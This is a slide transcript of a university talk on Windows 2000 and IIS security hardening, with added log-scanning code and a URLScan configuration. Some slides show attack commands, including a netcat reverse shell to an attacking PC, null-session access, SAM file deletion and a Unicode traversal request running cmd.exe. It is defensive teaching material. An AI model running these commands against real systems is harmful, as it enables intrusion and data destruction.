WinSecurity

Transcript of WinSecurity

8/14/2019 WinSecurity

http://slidepdf.com/reader/full/winsecurity 1/70

Windows 2000 Security

Matthew Cook

Loughborough University
http://www.escarpment.net/


Introduction

Loughborough University

http://www.lboro.ac.uk/computing/

Janet Web Cache Service

http://wwwcache.ja.net


Security @ Lboro

- Evaluation of Security Service/Policy
- Demand for Windows and Linux security advice
- Need for other OS security advice
- Installation of Internet Facing Windows 2000 systems


Windows 2000 Security

- Overview of General Security Threats
- Workstation Security
- Server Security
- IIS Security
- Security Tools
- Questions and Answers


Physical Security

"The only system which is truly secure is one which is switched off and unplugged, locked in a titanium lined safe, buried in a concrete bunker, and is surrounded by … very highly paid armed guards. Even then, I wouldn't stake my life on it."

Gene Spafford 


Security Threats

- Denial of Service
- Theft of information
- Modification
- Fabrication (Spoofing or Masquerading)


Security Holes

- Physical Security Holes
- Software Security Holes
- Incompatible Usage Security Holes
- Social Engineering
- Complacency


Workstation Security

Security for General Workstations


Workstation Security

- Physical Security
- BIOS
- Service Packs and Hot fixes
- NTFS ACLs
- Policies and Profiles
- Security Templates
- Auditing
- Threats


Service Packs and Hot fixes

- Ensure you have the latest ‘evaluated’ service packs and hot fixes.
- Check the model periodically
- Hfnetchk Tool


NTFS ACLs

- Ensure you use NTFS
- Partition your drives per application
- Use xcacls from the Resource Kit
- Script NTFS security
- Set using Security Templates
- Example


Policies and Profiles

- NT Policy files are different to GPO (Group Policy Objects) in Windows 2000
- LGPO located in: %windir%\system32\grouppolicy
- ADGPO located in: %windir%\system32\sysvol\camford\policies
- Demonstration


Security Templates

- Use the ‘Security Settings’ applet to apply
- Located in %windir%\security\templates
- Quick and easy to apply
- Templates are cumulative
- Demonstration


Security Templates…

- Setup security – Default settings
- Compatws – Compatible
- Basicdc/sv/wk – Basic Security
- Securedc/wk – More Secure
- Hisecdc/ws – Further Security
- Ocfiless/w – Optional Components


Auditing & Event Logs

- Use the ‘Security Settings’ applet to ensure the Audit Policy has been configured
- Check the Event Viewer regularly
- Or use NTLast (Foundstone)
- URL: http://www.foundstone.com/
- Or ELM (TNT Software)
- URL: http://www.tntsoftware.com/


Threats

- PipeUpAdmin and PipeUpSAM
- Netddemsg
- EFS
- DOS Boot disc
- Linux Boot disc
- BIOS Passwords


PipeUpAdmin & PipeUpSAM

- Uses vulnerability in Named Pipes in the Service Control Manager (SCM)
- Adds user to Administrator Group
- Patch Bulletin: MS00-053
- URL: http://www.dogmile.com/files/


Netddemsg

- Uses vulnerability in NetDDE
- Provides cmd in SYSTEM context
- Patch Bulletin: MS01-007
- NOT included in Windows 2000 SP2


EFS

- Changing the password of the recovery agent (Administrator)
- Changing the password of the user
- EFS temporary files


DOS Boot Disc

- DOS NTFS drivers bypass NTFS ACLs
- Allows removal of the SAM
  del %windir%\system32\config\sam
- Allows extraction of the SAM
- URL: http://www.sysinternals.com/
- URL: http://www.esiea.fr/public_html/Christophe.GRENIER/


Linux Boot Disc

- Edit SAM password hashes
- Disable SYSKEY
- Limited SCSI support
- URL: http://home.eunet.no/~pnordahl/


BIOS Passwords

- Even a BIOS password is not secure
- Check for vulnerabilities
- Check for Default Passwords
- Upgrade BIOS
- URL: http://www.esiea.fr/public_html/Christophe.GRENIER/


Server Security

Security for Internet Facing Servers


Server Security

- Advice for Workstation Security
- NetBIOS/SMB Services
- Hfnetchk and Qchain
- SNMP Vulnerabilities
- Active Directory Vulnerabilities
- IPSec


NetBIOS/SMB Services

- NetBIOS Name Service [Port UDP 137]
- NetBIOS Session Service [Port TCP 139]
- SMB over TCP [Port 445]
- Port 445 Windows 2000 only
- Block TCP/UDP 135-139 and 445 at the firewall


NetBIOS/SMB Services…

- Null Authentication:
  net use \\camford\IPC$ "" /u:""
- Famous tools like ‘Red Button’
  net view \\camford
- Investigate srvcheck and srvinfo in the Resource Kit


NetBIOS/SMB Services…

- Dumpsec from Somarsoft
- URL: http://www.somarsoft.com
- Enum from Razor
- URL: http://razor.bindview.com/
- A Google search reveals many, many more


NetBIOS/SMB Services…

To disable NetBIOS:

2. Select ‘Disable NetBIOS’ in the WINS tab of advanced TCP/IP properties.
3. Deselect ‘File and Print sharing’ in the advanced settings of the ‘Network and Dial-up connections’ window.


NetBIOS/SMB Services…

Disable Null Authentication

- Key similar to Windows NT 4.0
- HKLM\SYSTEM\CurrentControlSet\Control\LSA\RestrictAnonymous
- REG_DWORD set to 0, 1 or 2!
- HKLM\SYSTEM\CurrentControlSet\Control\SecurePipeServers\RestrictAnonymous
- REG_DWORD set to 0 or 1


Hfnetchk

- Use Hfnetchk to check hot fixes
- Checks machines against Microsoft XML
- Automate the process using batch files and a mail client (Postie)
- URL: http://www.infradig.com/infradig/postie/
- Use QChain to chain hot fixes together without rebooting in-between.


Hfnetchk…

Patch details for:

- Windows NT 4.0 and Windows 2000
- IIS 4 and IIS 5
- SQL Server 7.0
- SQL Server 2000
- Internet Explorer 5.01 (and later)


Hfnetchk…

- Default scan of local host (pre-downloaded XML)
  hfnetchk -x mssecure.xml
- Default scan of lboro domain
  hfnetchk -d lboro
- Verbose scan of local host
  hfnetchk -v -x mssecure.xml
- Verbose scan including installed hot fixes
  hfnetchk -v -a b -x mssecure.xml


QChain

Supported by:

- Windows NT 4.0
- Windows 2000
- Windows XP (25th October 2001)


QChain…

- Run each hot fix with -z (no reboot) and -m (quiet mode)
- Run qchain and then reboot
- Create a log using qchain [logname]
- Create batch files on a central server
- URL: http://www.microsoft.com/Downloads\Release.asp?ReleaseID=29821


SNMP Vulnerabilities

- Simple Network Management Protocol
- snmpwalk camford public .1.3.6.1.4.1.77.1.2.25
- SNMP Utilities in Resource Kit
- Turn off SNMP services
- Set community names
- Set accepted hosts


SNMP Vulnerabilities…


IPSec

- Currently investigating
- Linux Connectivity using FreeS/WAN
- Mainly for wireless use
- WEP encryption cracked
- URL: http://www.freeswan.org/
- URL: http://airsnort.sourceforge.net/


IIS Security

Internet Information Server 


IIS Security

- History
- Recent Worms
- IIS Lock Down Tool
- URL Scan
- The Future


IIS History

- IIS 2.0 Installed by NT 4.0
- IIS 3.0 followed by more common IIS 4.0
- Quickly gained reputation for (in)security
- IIS 5.0 Installed by Windows 2000
- Microsoft releases Hfnetchk
- Closely followed by IIS Lockdown and URLScan


Recent Worms

- Sadmind/IIS
  Directory Traversal (Unicode Exploit)
- CodeRed
  ida/idq buffer overflow
- CodeGreen
  ida/idq buffer overflow
- Nimda
  Directory Traversal (Unicode Exploit)


Sadmind/IIS

- 2001-05-03 22:34:49 203.67.x.x - 158.125.x.x 80 GET /scripts/root.exe /c+echo+^<html^>^<body+bgcolor%3Dblack^>^<br^>^<br^>^<br^>^<br^>^<br^>^<br^>^<table+width%3D100%^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>f***+USA+Government^</font^>^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>f***+PoizonBOx^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D4+color%3Dred^>contact:[email protected]^</html^>>../wwwroot/default.htm 200 -


System Attacks

- Monday Morning Phone Call
- Perl Script ‘unicodeloader’
- http://camford/scripts/upload.asp
- http://camford/scripts/cmdasp.asp
- Sadmind/IIS worm and unicodeloader kit
- GET /scripts/../../winnt/system32/cmd.exe /c+dir 200 -
- URL: http://www.sensepost.com/
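An added detection example, not code from the slides or from Loughborough's own tooling: it parses W3C extended IIS log entries like the two quoted on the Sadmind/IIS and System Attacks slides and flags the Unicode traversal, command-interpreter and ida/idq overflow patterns listed under Recent Worms. The field order, the sample entries and the indicator names are constructed assumptions.

```python
import re
from urllib.parse import unquote_to_bytes

# Field order assumed for the W3C extended entries quoted on the slides (a real log states its own order in its #Fields: header).
FIELDS = ["date", "time", "c_ip", "cs_username", "s_ip", "s_port",
          "cs_method", "cs_uri_stem", "cs_uri_query", "sc_status"]

# Constructed sample entries: the two slide log lines, a Code Red style
# .ida request, and a benign request. x.x octets are masked as on the slides.
SAMPLE_LOG = "\n".join([
    "2001-05-03 22:34:49 203.67.x.x - 158.125.x.x 80 GET /scripts/root.exe "
    "/c+echo+defaced>../wwwroot/default.htm 200 -",
    "2001-05-03 22:35:02 203.67.x.x - 158.125.x.x 80 GET "
    "/scripts/..%c0%af../winnt/system32/cmd.exe /c+dir 200 -",
    "2001-07-19 10:02:11 10.0.0.5 - 158.125.x.x 80 GET /default.ida "
    + "N" * 220 + "%u9090%u6858%ucbd3 200 -",
    "2001-05-03 22:40:00 192.168.1.20 - 158.125.x.x 80 GET /index.htm - 200 -",
])

# Overlong UTF-8 lead sequences: IIS 4/5 decoded %c0%af as '/', which is how "..%c0%af.." escaped /scripts (the Unicode traversal).
OVERLONG = re.compile(rb"[\xc0\xc1][\x80-\xbf]|\xe0[\x80-\x9f][\x80-\xbf]")
INTERPRETERS = re.compile(rb"(cmd|root|tftp|nc)\.exe", re.I)

def parse_line(line):
    """Split one entry into a dict; None for header (#) or short lines."""
    parts = line.split()
    if line.startswith("#") or len(parts) < len(FIELDS):
        return None
    return dict(zip(FIELDS, parts))

def classify(entry):
    """Return the indicator names found in one parsed entry."""
    stem, query = entry["cs_uri_stem"], entry["cs_uri_query"]
    stem_b = unquote_to_bytes(stem)
    decoded = stem_b + b"?" + unquote_to_bytes(query)
    hits = []
    if OVERLONG.search(decoded):
        hits.append("overlong-utf8")
    if b".." in stem_b:                 # traversal visible only after decoding
        hits.append("dot-dot-traversal")
    if INTERPRETERS.search(decoded):    # cmd.exe or a renamed copy such as root.exe
        hits.append("command-interpreter")
    if re.search(r"\.id[aq]$", stem, re.I) and (len(query) > 200 or "%u" in query.lower()):
        hits.append("ida-idq-overflow")  # Code Red / CodeGreen: long .ida query, %u shellcode
    return hits

def scan(log_text):
    """Return (client ip, uri stem, indicators) for every flagged entry."""
    findings = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        hits = classify(entry) if entry else []
        if hits:
            findings.append((entry["c_ip"], entry["cs_uri_stem"], hits))
    return findings
```

Run `scan()` over a real ex*.log after checking its #Fields: header matches FIELDS; the decoded-bytes check is what catches the %c0%af variant that a plain string match on "../" misses.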


System Attacks…

- Obtaining a remote shell
- Attacking PC:
  nc -l -p 1234
- Camford:
  nc.exe -v -e cmd.exe <attackingpc> 1234
- URL: http://www.atstake.com/research/tools/


System Attacks…

- Shell is in the context of IUSR_camford
- ISAPI.dll – RevertToSelf (Horovitz)
- Upload using upload.asp
- http://camford/scripts/idq.dll
- Version 2 coded by Foundstone
- http://camford/scripts/idq.dll?
- Patch Bulletin: MS01-26
- NOT included in Windows 2000 SP2


IIS Lock Down Tool

- Automatic ‘Lock Down’
- Locks down IIS 4.0 and IIS 5.0
- Express ‘lock down’ for simple web sites
- Custom ‘lock down’ for more complex servers
- Undo facility to reverse last ‘lock down’
- URL: http://www.microsoft.com/Downloads\Release.asp?ReleaseID=32362


IIS Lock Down Tool…

Disable:

- Active Server Pages
- Index Server Interface
- Server Side Includes
- Internet Data Connector
- Internet Printing
- HTR Scripting

Remove:

- Sample Web Files
- Script Virtual Directory
- MSADC Directory
- WebDAV

Set Permissions on:

- Exe files
- Content Directories


URL Scan

- ISAPI filter scans incoming HTTP requests
- Filtered based on rule set
- New rules easily added
- Default urlscan.ini suitable for static pages
- Restart service when changes made
- 404 and logged request for matched rules
- URL: http://www.microsoft.com/Downloads\Release.asp?ReleaseID=32571


URL Scan…

Filter on:

- The request method (verb)
- File Extension
- URL Encoding
- Non ASCII characters
- Malicious character sequence
- Headers in HTTP GET
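An added urlscan.ini fragment, not the default file shipped with URLScan: it maps each item of the list above onto the section or key that enforces it, with the permissive value noted in a comment beside the restrictive one. Section and key names are URLScan 2.x's; the list contents are illustrative, not a recommended production set.

```ini
[Options]
; 1: only the verbs in [AllowVerbs] pass; 0 would fall back to a [DenyVerbs] list
UseAllowVerbs=1
; 0: block the extensions in [DenyExtensions]; 1 with an [AllowExtensions] list suits a static-only site
UseAllowExtensions=0
; decode the URL once before the rules are applied, and reject it
; if a second decode changes it again (double encoding)
NormalizeUrlBeforeScan=1
VerifyNormalization=1
; reject non-ASCII bytes in the URL (1 would let them through)
AllowHighBitCharacters=0
; reject a dot that is not a file extension, so '..' and '/dir.name/' are refused
AllowDotInPath=0
; rejected requests are answered with 404; with logging on they are also written to the URLScan log
EnableLogging=1

[AllowVerbs]
GET
HEAD
POST

[DenyHeaders]
Translate:
If:
Lock-Token:
Transfer-Encoding:

[DenyExtensions]
.exe
.bat
.cmd
.com
.ida
.idq
.htr
.idc
.printer
.shtml
.stm

[DenyUrlSequences]
; directory traversal
..
./
\
; alternate data stream access
:
; escaping left over after normalisation
%
; more than one CGI process on one request
&
```

Restart the web service after editing, as the slide says, and read the URLScan log for a few days before tightening further: every rejected request is recorded with the rule that matched it.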


The Future

- Gartner report recommends ditching IIS
- Rewrite of IIS on the cards for version 6
- Lock Down Tool (Interim Measures)
- Httpd functionality in the kernel (TechEd)
- IIS Lockdown included in SP3
- Further implications for .NET


Security Tools

A look at the freeware and ‘pay for’ tools available.


Security Tools

- Snort
- CIS and Typhon
- Pwdump
- Fport
- L0pht Crack
- Nmap
- Nessus
- Pandora


Snort

- IDS – Intrusion Detection System
- Libpcap packet sniffer and logger
- Originally developed for the Unix platforms
- Open Source
- Port to Win32 available (Release 1.8.1)
- Installation on Win32 in under 30 minutes
- Run on your IIS server or standalone


Snort…

Snort can detect:

- Stealth Port Scans
- CGI Attacks
- Front Page Extensions Attacks
- ICMP Activity
- SMTP Activity
- SQL Activity
- SMB Probes


Snort…

- Default logging to snort\logs\alert.ids
- Log to MySQL and SQL Server
- Notification as logs, ‘winpopup’, email etc
- SnortSnarf or ACID (PHP based)
- GUI – IDS Center
- URL: http://snort.sourcefire.com/
- URL: http://www.cert.org/kb/acid/
- URL: http://www.silicondefense.com/


Snort…


CIS and Typhon

- Typhon, formerly Cerberus Internet Scanner
- Written by David Litchfield
- URL: http://www.nextgenss.com/
- Demonstration


CIS and Typhon

- Web Checks
- FTP Checks
- SMTP Checks
- POP3 Checks
- NT Checks
- NetBIOS Checks
- MS SQL Checks
- SNMP Checks
- RPC Checks
- Portscan (TCP/UDP)
- Finger Checks
- DNS Checks
- Commercial Version


Pwdump

- Version 3 (e = encrypted)
- Developed by Phil Staubs and Erik Hjelmstad
- Based on pwdump and pwdump2
- URL: http://www.ebiz-tech.com/html/pwdump.html


Pwdump…

- Needs Administrative Privileges
- Extracts hashes even if syskey is installed
- Extract from remote machines
- Identifies accounts with no password
- Self contained utility


Fport

- Reports on all open TCP and UDP ports
- Maps Port to Application
- Requires psapi.dll (Windows NT 4.0)
- URL: http://www.foundstone.com/
- Demonstration


L0pht Crack

- Password Auditing and Recovery
- Crack Passwords from many sources
- Registration $249
- URL: http://www.atstake.com/research/lc3/
- Demonstration


L0pht Crack…

Crack Passwords from:

- Local Machine
- Remote Machine
- SAM File
- SMB Sniffer
- PWDump file


Nmap

- Port Scanning Tool
- Stealth scanning, OS Fingerprinting
- Open Source
- Runs under Unix based OS
- Port development for Win32
- URL: http://www.insure.org/nmap/


Nmap…


Nessus

- Remote security scanner similar to Typhon
- Very comprehensive
- Frequently updated modules
- Testing of DoS attacks
- Open Source
- Win32 and Java Client
- URL: http://nessus.org/


Pandora

- Not strictly Windows 2000 Security
- Runs on either Unix or Win32
- Excellent tool to evaluate Netware security
- Open Source
- Lots of additional information
- URL: http://www.nmrc.org/pandora/


Questions and Answers